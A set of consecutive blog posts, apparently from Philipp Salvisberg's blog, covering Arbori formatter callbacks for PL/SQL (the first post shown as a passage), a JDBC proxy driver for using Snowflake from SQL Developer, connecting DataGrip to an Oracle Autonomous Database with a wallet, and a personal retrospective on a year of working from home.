    FOR r IN (SELECT ename AS emp_name,
    sal AS salary
    FROM emp
    WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added a newline after , on line 3.

brkX2

This function expects a node in tuple. A node identifies a significant statement.

Depending on the setting for “Line Breaks After statement” one or two newlines are added to newLinePositions. For “Preserve Original” the original newline characters will be extracted from the source during serialization. “Preserve Original” means that it will also preserve missing newlines. As a result, the formatting result may differ based on the input.

“Double break” is the default.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename AS emp_name,
    sal AS salary
    FROM emp
    WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatting result has an additional empty line on line 2.

rightAlignments

This function expects a node in tuple. It calculates the length in characters of the passed node. If it is less than 6 (the length of the SELECT keyword), then the missing spaces are added to newLinePositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename AS emp_name,
    sal AS salary
      FROM emp
     WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added two spaces before the FROM on line 6 and one space before the WHERE on line 7. However, the query block is not yet right-aligned. This will happen in incrementalAlignments.

paddedIdsInScope

This function expects a scope, predecessor and follower in tuple. It populates the following fields:

  • maxLengthInScope of type Map<String, Integer>, where the key is an interval representation of a scope (containing to and from position) and the value the calculated max length
  • id2scope of type Map<Integer, String>, where the key is the start position of a follower node and the value an interval representation of a scope (containing to and from position)
  • id2interval of type Map<Integer, Integer>, where the key is the start position of a follower node and the value the start position of a predecessor node
  • id2adjustments of type Map<Integer, Integer>, where the key is the start position of a follower node and the value is the indentation

The newLinePositions field is read but not written. As a result, the position of paddedIdsInScope in the Arbori program is important.

The serializer adds the necessary number of spaces between the predecessor and follower nodes to left-align followers within the scope.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
    sal    AS salary
      FROM emp
     WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added one space before the AS on line 4 and two spaces before the AS on line 5. However, the result looks wrong because ename and sal are not yet left-aligned. This will happen in pairwiseAlignments.

incrementalAlignments

This function expects a node in tuple. It adds spaces to all children with a content in newLinePositions to left-align them with the start position in node.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
              sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added ten spaces at the beginning of lines 5, 6 and 7. As a result SELECT, sal, FROM and WHERE are now left-aligned. Please note that the algorithm considers the spaces added in rightAlignments.

pairwiseAlignments

This function expects a node and a predecessor in tuple. It left-aligns the node with its predecessor by adding spaces to newLinePositions for the start position of node.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;

pairwiseAlignments:
  [predecessor) select_list & [node) select_term & [node-1) ',' & predecessor=node-1-1 
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added seven spaces at the beginning of line 5. Now all select terms are left-aligned.

ignoreLineBreaksBeforeNode

This function expects a node in tuple. It removes the entry in newLinePositions for the start position of node. As a result the serializer will emit a space before this node.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;

pairwiseAlignments:
  [predecessor) select_list & [node) select_term & [node-1) ',' & predecessor=node-1-1 
  ->
;

ignoreLineBreaksBeforeNode:
   [node) pls_expr & [node-1) 'IF' /* override breaks in indentedNodes */
   ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatting result does not contain a newline after the IF on line 9.

ignoreLineBreaksAfterNode

This function expects a node in tuple. It is similar to ignoreLineBreaksBeforeNode. The only difference is that it removes the end position of a node from newLinePositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;

pairwiseAlignments:
  [predecessor) select_list & [node) select_term & [node-1) ',' & predecessor=node-1-1 
  ->
;

ignoreLineBreaksBeforeNode:
   [node) pls_expr & [node-1) 'IF' /* override breaks in indentedNodes */
   ->
;

ignoreLineBreaksAfterNode:
   [node) pls_expr & [node+1) 'THEN' /* override breaks set in indentedNodes */
   ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF r.salary > 2.9e3 THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

This is the final result using every callback function. The formatting result does not contain a newline before the THEN on line 9 anymore. Everything looks good now.

Summary

There are simpler ways to produce the final formatting result. However, the goal was to show the impact of every callback function. While the final Arbori program in this blog post produces reasonably well formatted code, it is far from complete.

If you are interested in alternative formatter settings, I suggest having a look at this GitHub repository.


Accessing Snowflake from SQL Developer


My first day of work this year was a training day. As a participant in a “Snowflake Fundamentals” training course. I opted for the four-day, multi-week option so that I would have time to better absorb what I had just learned. Tomorrow is my third day and I plan to write more about Snowflake once I complete this training.

The Problem

As a long-time Oracle SQL Developer user, I tried to connect to Snowflake via SQL Developer. SQL Developer supports the following database systems via third-party JDBC drivers:

  • TimesTen
  • Amazon Redshift
  • Cloud
  • DB2
  • Hive
  • JDBC
  • MongoDB
  • MySQL
  • PostgreSQL
  • SQLServer
  • Sybase
  • Teradata

The generic “JDBC” variant sounds promising. Why is this option not shown when creating a new connection? Because this driver requires the JDBC-ODBC bridge (as does the Microsoft Access driver, by the way, which is not available in non-Windows environments). SQL Developer has required JDK 8 since version 4.1. And JDK 8 does not include the JDBC-ODBC bridge anymore.

But wait. In SQL Developer Data Modeler (SDDM) there is a generic JDBC driver that can connect to any database system. Kent Graziano described in this blog post how to configure it for Snowflake. And Federico Sicilia explained in this blog post how to deal with Snowflake-specific data types. However, SDDM accesses the database exclusively via JDBC’s DatabaseMetaData interface. That’s why a generic JDBC driver is applicable in SDDM. SQL Developer, on the other hand, uses mainly SQL statements, and as a result the generic JDBC driver used in SDDM is not sufficient for use in SQL Developer. Of course, Oracle could implement support for such a driver, but since access to third-party database systems is provided in the context of data migrations only, this does not have a high priority.
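To illustrate the difference: everything SDDM needs can be fetched through the standard DatabaseMetaData interface, without a single line of database-specific SQL. The following sketch lists tables via any compliant JDBC driver; the Snowflake URL, schema and credentials are placeholders:

import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.DriverManager;
import java.sql.ResultSet;

public class MetaDataOnly {
    public static void main(String[] args) throws Exception {
        // any compliant JDBC driver works here, Snowflake's included
        try (Connection con = DriverManager.getConnection(
                "jdbc:snowflake://myaccount.snowflakecomputing.com", "user", "password")) {
            DatabaseMetaData md = con.getMetaData();
            // standard metadata call, no database-specific SQL involved
            try (ResultSet rs = md.getTables(null, "PUBLIC", "%", new String[] {"TABLE"})) {
                while (rs.next()) {
                    System.out.println(rs.getString("TABLE_SCHEM") + "." + rs.getString("TABLE_NAME"));
                }
            }
        }
    }
}

SQL Developer, in contrast, sends dictionary queries that are specific to each supported database system, which is why the driver alone is not enough.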

Briefly: no generic JDBC driver, no support for Snowflake’s JDBC driver in SQL Developer.

Options?

What are the alternatives? Use other tools such as Snowflake’s web UI worksheets, the CLI snowsql or a third-party IDE that supports Snowflake, for example DBeaver or JetBrains’ DataGrip. These options work well and are recommended.

However, if you still want to access Snowflake from SQL Developer then I see basically two options:

  1. Write an extension that provides an additional connect panel (combobox entry) in SQL Developer
  2. Write a JDBC proxy that acts like a supported driver, e.g. MySQL

The first option is the most user-friendly one. In theory. In practice it will be difficult to make it work, because third-party extensions need a UI action (e.g. their own button or menu item) to initialize the load of the extension, at least for the very first time. Once it is loaded it is cached. This makes it not that user-friendly after all, because a connect panel offers no additional action the user could trigger to load the extension. I dealt with bugs in this area in other SQL Developer extensions, so I know what I’m talking about. Unless you want to introduce a dummy action, this approach is a dead end.

The second option sounds easy. SQL Developer allows to add third party JDBC drivers. So let’s do that.

The Solution

As almost always, it was more work than anticipated. In the end I successfully implemented a JDBC proxy that mimics a MySQL driver and delegates requests to a configurable target JDBC driver. The target JDBC driver can be Snowflake, PostgreSQL, SQLite, H2 or MySQL. Adding more database systems should not be that difficult, as long as the JDBC driver is available on Maven Central.
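The core of the delegation idea fits in a few lines. This is a heavily simplified sketch, not the actual project code; the real driver also has to answer MySQL-specific queries, and the targetUrl property is a made-up configuration mechanism:

import java.sql.Connection;
import java.sql.Driver;
import java.sql.DriverManager;
import java.sql.DriverPropertyInfo;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.Properties;
import java.util.logging.Logger;

public class ProxyDriver implements Driver {

    static {
        try {
            // register under a MySQL-style URL so SQL Developer offers its MySQL connect panel
            DriverManager.registerDriver(new ProxyDriver());
        } catch (SQLException e) {
            throw new ExceptionInInitializerError(e);
        }
    }

    @Override
    public boolean acceptsURL(String url) {
        return url != null && url.startsWith("jdbc:mysql:");
    }

    @Override
    public Connection connect(String url, Properties info) throws SQLException {
        if (!acceptsURL(url)) {
            return null; // JDBC contract: return null for foreign URLs
        }
        // delegate to the real driver, e.g. Snowflake's (hypothetical property)
        String targetUrl = info.getProperty("targetUrl");
        return DriverManager.getConnection(targetUrl, info);
    }

    @Override
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) {
        return new DriverPropertyInfo[0];
    }

    @Override
    public int getMajorVersion() { return 1; }

    @Override
    public int getMinorVersion() { return 0; }

    @Override
    public boolean jdbcCompliant() { return false; }

    @Override
    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
        throw new SQLFeatureNotSupportedException();
    }
}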

I released this driver as an open source project. The README.md on GitHub explains how it works and how to install it. Hence I’m not going to repeat that in this blog post. You can download this driver from here.

An Example

I like to use the tables DEPT and EMP to demonstrate things. Everyone in the Oracle field knows them. And therefore no lengthy or distracting introduction is necessary. Let’s create these tables in Snowflake:

CREATE TABLE dept (
   deptno   NUMERIC(2)   CONSTRAINT pk_dept PRIMARY KEY,
   dname    VARCHAR(14)  NOT NULL,
   loc      VARCHAR(13)  NOT NULL 
);

INSERT INTO dept VALUES 
   (10, 'ACCOUNTING', 'NEW YORK'),
   (20, 'RESEARCH',   'DALLAS'),
   (30, 'SALES',      'CHICAGO'),
   (40, 'OPERATIONS', 'BOSTON');

CREATE TABLE emp (
   empno    NUMERIC(4)     CONSTRAINT pk_emp PRIMARY KEY,
   ename    VARCHAR(10)    NOT NULL,
   job      VARCHAR(9)     NOT NULL,
   mgr      NUMERIC(4),
   hiredate DATE           NOT NULL,
   sal      NUMERIC(7,2)   NOT NULL,
   comm     NUMERIC(7,2),
   deptno   NUMERIC(2)     CONSTRAINT fk_deptno REFERENCES dept,
   CONSTRAINT fk_mgr FOREIGN KEY (mgr) REFERENCES emp
);

INSERT INTO emp VALUES 
   (7839, 'KING',   'PRESIDENT', NULL, DATE '1981-11-17', 5000, NULL, 10),
   (7698, 'BLAKE',  'MANAGER',   7839, DATE '1981-05-01', 2850, NULL, 30),
   (7499, 'ALLEN',  'SALESMAN',  7698, DATE '1981-02-20', 1600, 300,  30),
   (7900, 'JAMES',  'CLERK',     7698, DATE '1981-12-03', 950,  NULL, 30),
   (7654, 'MARTIN', 'SALESMAN',  7698, DATE '1981-09-28', 1250, 1400, 30),
   (7844, 'TURNER', 'SALESMAN',  7698, DATE '1981-09-08', 1500, 0,    30),
   (7521, 'WARD',   'SALESMAN',  7698, DATE '1981-02-22', 1250, 500,  30),
   (7782, 'CLARK',  'MANAGER',   7839, DATE '1981-06-09', 2450, NULL, 10),
   (7934, 'MILLER', 'CLERK',     7782, DATE '1982-01-23', 1300, NULL, 10),
   (7566, 'JONES',  'MANAGER',   7839, DATE '1981-04-02', 2975, NULL, 20),
   (7902, 'FORD',   'ANALYST',   7566, DATE '1981-12-03', 3000, NULL, 20),
   (7369, 'SMITH',  'CLERK',     7902, DATE '1980-12-17', 800,  NULL, 20),
   (7788, 'SCOTT',  'ANALYST',   7566, DATE '1987-04-19', 3000, NULL, 20),
   (7876, 'ADAMS',  'CLERK',     7788, DATE '1987-05-23', 1100, NULL, 20);

The result in SQL Developer looks as follows:

SQL Developer does not understand this multi-row INSERT statement. That’s why it shows a pink wavy line on line 8. Nevertheless SQL Developer can execute these statements. That’s excellent.

Now, let’s show the newly created tables in the Connections window and some details for table DEPT. I like SQL Developer’s integration of SDDM and the ability to create an ad-hoc model. Here it is:

From my point of view there is no reason to avoid integrity constraints. Even if they are not enforced by the database system, they still help the user to better understand the model. In this model you see that MGR is a foreign key column and it is optional. That’s nice.

Summary

The implementation of a JDBC proxy driver for accessing Snowflake from SQL Developer started as an experiment. The result works amazingly well. As a side effect, I can now access my SQLite and H2 databases from SQL Developer as well. Other IDEs, however, offer more database-specific features. Anyway, the ability to access multiple database systems from SQL Developer has some value. At least for me.

What do you think of it? Is this useful or just another unnecessary feature? Please post your thoughts below. Thanks.

The post Accessing Snowflake from SQL Developer appeared first on Philipp Salvisberg's Blog.

Connecting via JDBC to the Oracle Cloud


You can connect to an Oracle Autonomous Database in different ways. This is well documented here. It’s a bit different from what we know from on-premises environments. In this blog post, I show the steps to connect to an Autonomous Database from a third-party IDE like DataGrip.

From a JDBC perspective, this is just an ordinary JDBC URL with some driver-specific properties. Therefore, this approach should work for any JDBC-based IDE and also for any Java application.

Step 1 – Download the Wallet

Go to your Autonomous Database and click on the “DB Connection” button. A screen similar to the following appears:

Press the “Download Wallet” button and enter a password. This password is used to protect the key store and the trust store. We will need it later. I named my instance “ATP21”. Therefore, in my case, a zip archive named “Wallet_ATP21.zip” was downloaded.

Step 2 – Unzip the Wallet

Unzip the downloaded zip file and move it to a location where you want to keep it. The wallet contains the following files:

  • README
  • ewallet.p12
  • ojdbc.properties
  • tnsnames.ora
  • cwallet.sso
  • keystore.jks
  • sqlnet.ora
  • truststore.jks

Open the file “tnsnames.ora” in a text editor. It contains 5 entries. We need one of those entries to build the JDBC connection string. I highlighted the relevant part of the first entry in the next screenshot:
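
For illustration, such an entry has roughly the following shape; the host, the service name and the certificate DN are placeholders:

atp21_high = (description=
   (retry_count=20)(retry_delay=3)
   (address=(protocol=tcps)(port=1522)(host=<adb-host>.oraclecloud.com))
   (connect_data=(service_name=<prefix>_atp21_high.adb.oraclecloud.com))
   (security=(ssl_server_cert_dn="CN=<adb-host>.oraclecloud.com, O=Oracle Corporation, L=Redwood City, ST=California, C=US")))

The relevant part for the JDBC URL is everything after the equal sign.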

Step 3a – Configure Connection in DataGrip (Legacy Driver)

Add a new connection in DataGrip and select “Oracle” as shown in the following screenshot:


In the “General” tab change the Connection type to “URL only”. Enter the user, the password and the complete JDBC URL as shown in the next screenshot:

The URL starts with jdbc:oracle:thin:@. The rest is the text I've highlighted in the tnsnames.ora file above.

Then click on the “Advanced” tab and define the following properties:
  • javax.net.ssl.trustStore
  • javax.net.ssl.trustStorePassword
  • javax.net.ssl.keyStore
  • javax.net.ssl.keyStorePassword

Here are my settings (of course you need to amend the values to match the environment of your wallet):
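
For illustration, the four properties point into the unzipped wallet directory and use the password chosen in step 1; the paths and the password are placeholders:

javax.net.ssl.trustStore=/path/to/Wallet_ATP21/truststore.jks
javax.net.ssl.trustStorePassword=<wallet password>
javax.net.ssl.keyStore=/path/to/Wallet_ATP21/keystore.jks
javax.net.ssl.keyStorePassword=<wallet password>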

Step 3b – Configure Connection in DataGrip (Current Driver)

DataGrip automatically downloads the latest Oracle Database JDBC driver, in my case version 21.1.0.0. Since version 18.3 there is an easier way to connect. The JDBC driver can access the wallet directory and its files. As a result, you no longer need to configure the javax.net.ssl.* JDBC properties. You just have to define one additional JDBC property, “TNS_ADMIN”, with the path to the wallet directory.

And of course you can pass this JDBC property directly in the JDBC URL as shown in the next screenshot:
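
For illustration, both variants look roughly as follows; the alias comes from the tnsnames.ora file and the path is a placeholder. As an additional JDBC property:

TNS_ADMIN=/path/to/Wallet_ATP21

Or directly in the JDBC URL:

jdbc:oracle:thin:@atp21_high?TNS_ADMIN=/path/to/Wallet_ATP21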

Conclusion

Establishing a connection to an Autonomous Database requires a wallet. The JDBC driver needs access to this wallet. This doesn’t make things easier, but it doesn’t make them overly complicated either.

However, you need to deal with this additional resource on a regular basis because the wallet has a limited lifetime. This is documented in the README file.

Wallet Expiry Date
-----------------------
This wallet was downloaded on 2021-02-28 08:16:36.267 UTC.
The SSL certificates provided in this wallet will expire on 2023-03-19 21:43:22.0 UTC.
In order to avoid any service interruptions due to an expired SSL certificate, you must re-download the wallet before this date.

So I have to update my wallet in two years, otherwise I won't be able to connect anymore.

The post Connecting via JDBC to the Oracle Cloud appeared first on Philipp Salvisberg's Blog.

Work From Home – First Anniversary


The last time I was on-site at a customer was March 10, 2020. I usually spent about 20-40% of my time working from home. But working exclusively from home is something completely different. A new experience. After a year it’s time for a brief personal retrospection.

The Good

More at Home

Pretty obvious, I know. Anyhow, I'm spending more time with my wife. She also works from home, at least most of the time. It's good to see that we get along well and that spending more time together doesn't become a problem. And I don't miss dinners with her because I want to finish some task at work or avoid a traffic jam, or both.

The Children Are Grown Up

Our boys are 29 and 27 years old. Both are healthy. Our older son changed his career path and is working part-time while studying computer science. Overall he is doing quite well. It's not that easy for our younger son, who is a producer, musician and DJ. Berlin was a perfect place for his career. However, the party scene is pretty dead at the moment. We as parents are happy to help where we can. When I hear about the problems other parents have with their younger children, pubescent teenagers and school, I'd say we can be really happy. Proud parents, for sure.

Better Mood

I spend much more time with our dog. I believe that my mood is generally better when he’s around. When I grab a fresh cup of coffee he demands his strokes or he can persuade me to play with him. Anyway he always makes me smile.

Upgraded Workplace

I improved my workplace at home. Here’s a list of some gadgets I ordered during this time:

Due to supply bottlenecks, I'm still waiting for some of these gadgets to be delivered. However, my workplace at home is now better than anything I ever had at a customer site or at one of my employer's workplaces.

Ready for Virtual Meetings

During working hours, I am always ready to have a video call. Microsoft Teams is open all the time. Establishing a call and sharing the screen has never been easier. In the past, I’ve joined the meeting a few minutes early because more often than not, I’ve run into a problem. Video, audio, or both. Maybe because I rarely used these tools and only launched them when needed. As a result, I was either early or late (restarts always take longer than you expect). These days I dial in on time, and technical problems are the exception. It’s almost as stable and easy as making a phone call. I also like that almost everyone has their webcam enabled. It makes the conversations more personal and makes communication better.

Better Virtual Meetings

In my experience, the fewer people participating in a video call, the better the call. For reviews or pair programming I find video calls even more efficient than physical meetings. Giving access to input devices happens in a much more controlled way. Grabbing the mouse or the keyboard does not work. You have to ask and wait for the other person to accept your request. I also find some Scrum rituals better in their virtual form. Tools such as Miro help to improve collaboration in a way I never experienced in a physical meeting. Working in parallel on a board works surprisingly well. I experienced that we are much faster and that all team members are aware of what others have written. A lot happens in parallel. Sorting and grouping while adding sticky notes. Better results in less time.

I have participated in various mixtures of physical and virtual meetings. Typically, most of the people met physically in a specially equipped room while a few others joined virtually. I call the persons in the same room first class participants. The others are second class participants. Why? They are not equally present at the meeting and they miss a lot of non-verbal communication. If audio and video are badly configured, some persons cannot be heard, and sometimes you never get a video stream of the talking person. A pure virtual meeting makes us all second class participants. All participants are equal from a technical point of view. For the former first class participants the meeting experience degraded. For all others it improved, a lot.

New Skill

I never felt comfortable with webinars. When I present, I need to feel the audience to get immediate feedback. The audience helps me adapt during the talk. Go faster, go slower or ask questions. This does not work in webinars. In the last year I had the chance to present at various virtual events. I think I'm getting better. For one event I pre-recorded two talks, which was very instructive. I completely underestimated the time required for such a task. For one talk I spent more than 12 hours to record 45 minutes. At that point I just decided that the result was good enough. However, I developed a new skill. And that's good.

So if you would ask me to do a webinar now, I might say yes.

The Bad

Lack of Informal Information Exchange

When I work at the customer site there are a lot of unplanned interactions. At my desk. Near my desk. At the coffee corner. After a meeting. During lunch. These are informal meetings or events where we exchange business or non-business related information. They happen more or less unplanned. When everyone is working from home, this kind of information exchange does not happen. The virtual coffee or lunch meetings are no suitable replacement. Why? Because when we meet physically we discuss things in groups. Interested persons join. Uninterested persons leave and join another group. So there are several bubbles. And certain information is exchanged between two persons only. A virtual coffee meeting using Zoom, Teams or similar cannot work this way. In the end it is unsatisfying for everyone. As a result I stopped joining these meetings.

After a year I think I feel the missing information. Scheduling virtual meetings does not help, because you cannot connect with people while they are in the “right” mood. And there is no way to check without starting a conversation.

This is bothering me because I have not found a good alternative yet.

Less Social Interactions

That, too, is somehow obvious. A consequence of isolation. Some people need more social interaction than others. I'm one of those who can live with fewer social contacts. However, almost none is too few, even for me. I'm very lucky that I don't live alone. So I am complaining on a very high level.

Blurred Boundaries Between Business and Private Life

Everything is accessible via my MacBook. Some things even via my iPhone. So it’s easy to switch between business and personal work. This is nothing new, but since I work 100% from home, I’ve had to introduce some additional rules to make sure business doesn’t creep into personal life and vice versa. I’m not super successful in this area. It’s a risk. Constant monitoring and control is necessary. In my view, the recipe for success is not to be controlled by others.

No Physical Meetings

The more sensitive a topic, the more important a physical meeting is. Why? Because we communicate on different levels. The spoken words. The tone of the voice. Other sounds or even smells. And last but not least the body language. In my opinion, body language accounts for more than 50%.

I believe that I can feel the mood of the persons in a room to a certain extent. Without special effort. I get these impressions intuitively. It's just there. However, in a virtual room I do not trust my impression, and often I do not get a good one even if all persons have enabled their video feed. Maybe it's just a matter of practice. Nevertheless, the face is what we see in a video stream and never the whole body. I think I miss legs, feet, arms and hands. Maybe also some sound. I don't know. Furthermore, in some situations persons hide their video stream. For a short moment or even longer periods. This is not possible in a physical meeting.

Technology might help in the future, but right now we have to live with the capabilities of the current technologies.

No Physical Conferences

I mentioned earlier that I like to give a talk in front of a real audience. A virtual setup is better than nothing, but not more. At a conference, there are a variety of opportunities to connect with people you know and people you don’t know. It’s natural. It’s the way we are used to interact. It is often the basis for future (virtual) collaboration.

However, I think there will be room for virtual or hybrid conferences in the future. As a result, there will be fewer physical conferences. The remaining physical conferences must offer clear added value beyond that of their virtual counterparts.

Vacation at Home

Every year since I started to work we have taken three consecutive weeks of vacation. We spend the time away from home. For me it doesn't matter where. The most important thing is a change of scene. Apart from that, nowadays I'm happy with a comfortable armchair where I can read some books. Last year we had to spend the vacation at home. I was only partially successful in breaking the routine. As a result the vacation was not as refreshing as in previous years. We have planned to spend three weeks this year in a very nice house at the Baltic Sea. However, I suspect that we will have to spend this vacation at home again. This gives me a chance to improve.

No Commute

When working at a customer site I typically spend two hours commuting. At first I thought that working from home, with a commute from the kitchen to my study, would be a good thing. It surely is from an environmental perspective. And I clearly do not miss the traffic jams. However, sitting down with a hot coffee at my desk feels like a cold start. I'm not ready for work yet.

